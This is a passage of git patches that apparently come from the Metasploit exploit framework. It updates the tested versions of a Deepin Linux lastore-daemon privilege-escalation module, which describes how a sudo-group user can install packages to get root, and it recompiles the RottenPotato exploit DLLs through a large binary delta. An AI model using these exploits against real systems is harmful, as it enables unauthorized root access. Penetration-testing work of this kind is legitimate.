SCREEN_EFFECTS = 'screen-effects' -# Module may cause software to output audio from the speakers (Example: the app plays music) +# Module may output audio from the speakers (Example: the app plays music) AUDIO_EFFECTS = 'audio-effects' -# Module may produce physical effects in hardware (Examples: LED or LCD changes or hardware beeps) +# Module may produce physical effects (Example: the device moves) PHYSICAL_EFFECTS = 'physical-effects' # From fe7ce02dfd502e8ede01c4f11a3a40182634a840 Mon Sep 17 00:00:00 2001 From: Brendan Coles Date: Thu, 4 Oct 2018 21:13:21 +0000 Subject: [PATCH 172/192] Update tested versions --- .../exploit/linux/local/lastore_daemon_dbus_priv_esc.md | 8 +++++--- .../exploits/linux/local/lastore_daemon_dbus_priv_esc.rb | 7 ++++--- 2 files changed, 9 insertions(+), 6 deletions(-) diff --git a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md index 2b18a1c51c..8532e6281d 100644 --- a/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md +++ b/documentation/modules/exploit/linux/local/lastore_daemon_dbus_priv_esc.md @@ -7,7 +7,7 @@ ## Vulnerable Application - The `lastore-daemon` D-Bus configuration on Deepin Linux 15.5 permits any + The `lastore-daemon` D-Bus configuration on Deepin Linux permits any user in the `sudo` group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the `sudo` group. @@ -30,8 +30,10 @@ ``` - This module has been tested successfully with lastore-daemon version - 0.9.53-1 on Deepin Linux 15.5 (x64). + This module has been tested successfully with lastore-daemon versions: + + * 0.9.53-1 on Deepin Linux 15.5 (x64) + * 0.9.66-1 on Deepin Linux 15.7 (x64) Deepin Linux is available here: diff --git a/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb b/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb index 002806dd9c..095de2f6df 100644 --- a/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb +++ b/modules/exploits/linux/local/lastore_daemon_dbus_priv_esc.rb @@ -18,13 +18,14 @@ class MetasploitModule < Msf::Exploit::Local This module attempts to gain root privileges on Deepin Linux systems by using lastore-daemon to install a package. - The lastore-daemon D-Bus configuration on Deepin Linux 15.5 permits any + The lastore-daemon D-Bus configuration on Deepin Linux permits any user in the sudo group to install arbitrary system packages without providing a password, resulting in code execution as root. By default, the first user created on the system is a member of the sudo group. - This module has been tested successfully with lastore-daemon version - 0.9.53-1 on Deepin Linux 15.5 (x64). + This module has been tested successfully with lastore-daemon versions + 0.9.53-1 on Deepin Linux 15.5 (x64); and + 0.9.66-1 on Deepin Linux 15.7 (x64). }, 'License' => MSF_LICENSE, 'Author' => From ce59964141dd695b0990fcbeaeed3029fb390015 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Thu, 4 Oct 2018 16:21:23 -0500 Subject: [PATCH 173/192] Recompile binaries and prep for VS2013 compiles --- .../rottenpotato/rottenpotato.x64.dll | Bin 327680 -> 328192 bytes .../rottenpotato/rottenpotato.x86.dll | Bin 251392 -> 250880 bytes .../exploits/rottenpotato/MSFRottenPotato.sln | 0 .../MSFRottenPotato/BlockingQueue.h | 1 + .../MSFRottenPotato/MSFRottenPotato.vcxproj | 2 +- 5 files changed, 2 insertions(+), 1 deletion(-) mode change 100644 => 100755 external/source/exploits/rottenpotato/MSFRottenPotato.sln mode change 100644 => 100755 external/source/exploits/rottenpotato/MSFRottenPotato/BlockingQueue.h diff --git a/data/exploits/rottenpotato/rottenpotato.x64.dll b/data/exploits/rottenpotato/rottenpotato.x64.dll index 7d934a39d8f3fc9182d0d6b6cb0e2782037837af..d035d1a1518f1cd240dfc94d06b55a16a2c99de0 100644 GIT binary patch delta 124503 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 